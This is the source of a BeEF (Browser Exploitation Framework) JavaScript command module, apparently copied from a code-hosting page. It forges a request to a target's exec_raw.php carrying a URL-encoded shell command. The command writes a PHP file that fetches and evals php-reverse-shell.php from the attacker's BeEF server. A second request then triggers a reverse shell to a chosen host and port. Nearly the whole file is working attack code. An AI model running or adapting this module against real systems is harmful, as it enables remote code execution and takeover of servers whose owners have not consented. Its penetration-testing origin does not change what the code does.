35 lines
1.6 KiB
JavaScript
35 lines
1.6 KiB
JavaScript
//
|
|
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
|
|
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
// See the file 'doc/COPYING' for copying permission
|
|
//
|
|
|
|
beef.execute(function() {
|
|
var rhost = '<%= @rhost %>';
|
|
var rport = '<%= @rport %>';
|
|
var lhost = '<%= @lhost %>';
|
|
var lport = '<%= @lport %>';
|
|
|
|
var uri = "http://" + rhost + ":" + rport + "/exec_raw.php?cmd=echo%20-e%20%22%23%21%2Fusr%2Flocal%2Fbin%2Fphp%5Cn%3C%3Fphp%20eval%28%27%3F%3E%20%27.file_get_contents%28%27" + beef.net.httpproto + "%3A%2F%2F" + beef.net.host + ":" + beef.net.port + "%2Fphp-reverse-shell.php%27%29.%27%3C%3Fphp%20%27%29%3B%20%3F%3E%22%20%3E%20x.php%3Bcat%20x.php%3Bchmod%20755%20x.php%3B";
|
|
|
|
beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
|
|
if(response.status_code == 200){
|
|
function triggerReverseConn(){
|
|
beef.net.forge_request("http", "GET", rhost, rport, "/x.php?ip=" + lhost + "&port=" + lport, null, null, null, 10, 'script', true, null,function(response){
|
|
if(response.status_code == 200){
|
|
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.");
|
|
}else{
|
|
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: second GET request failed.");
|
|
}
|
|
});
|
|
}
|
|
setTimeout(triggerReverseConn,5000);
|
|
}else{
|
|
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first GET request failed.");
|
|
}
|
|
});
|
|
|
|
|
|
});
|
|
|